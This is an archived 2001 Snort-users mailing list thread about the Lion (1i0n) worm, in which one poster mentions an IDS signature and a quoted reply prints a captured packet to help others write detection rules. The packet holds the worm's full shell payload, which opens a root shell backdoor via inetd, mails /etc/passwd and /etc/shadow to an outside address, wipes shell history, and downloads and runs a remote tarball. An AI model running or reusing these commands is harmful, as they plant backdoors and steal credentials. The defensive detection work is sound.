1i0n (aka lion worm) RE: [Snort-users] New Worm Virus is in the wild

Max Vision vision at ...4...
Fri Mar 23 15:02:25 EST 2001


Hi,

I created a signature to detect this attack February 8th, when the exploit
was released (IDS482/named-exploit-tsig-infoleak) - I did this because LSD
were the first people to release a *decent* working bind exploit.  So I
wrote a signature for it... sure enough that is exactly what is used by
this worm.  People using vision.conf since february 8th should have seen
alerts for this attack (if the worm dropped by, whether it was successful
or not).

Also I have been working on a detailed writeup but have suffered some
hardware problems this morning delaying its release.

Max Vision
http://whitehats.com/
http://maxvision.net/


On Fri, 23 Mar 2001, [iso-8859-1] Andreas �stling wrote:

> On Fri, 23 Mar 2001 Kevin.Brown at ...1022... wrote:
>
> > So there is already a signature for this?  I knew there was a Ramen sig,
> > does this show up the same?
>
> Here is what Lion in action looks like if you want to write a specific and
> optimized rule to catch it:
>
> Attacker:1046 -> victim:53 TCP TTL:49 TOS:0x0 ID:58766 IpLen:20 DgmLen:552
> DF
> ***AP*** Seq: 0xA6DDEA8C  Ack: 0xFE355B80  Win: 0x7D78  TcpLen: 32
> TCP Options (3) => NOP NOP TS: 48934346 5847363
> PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
> H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
> b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
> f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
>  /etc/shadow >>1i0n;mail 1i0nip at ...1434... <1i0n;rm -fr 1i0n;rm -
> fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
> 0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit
>
>
> I captured this packet by using a rule which simply checks for the st





More information about the Snort-users mailing list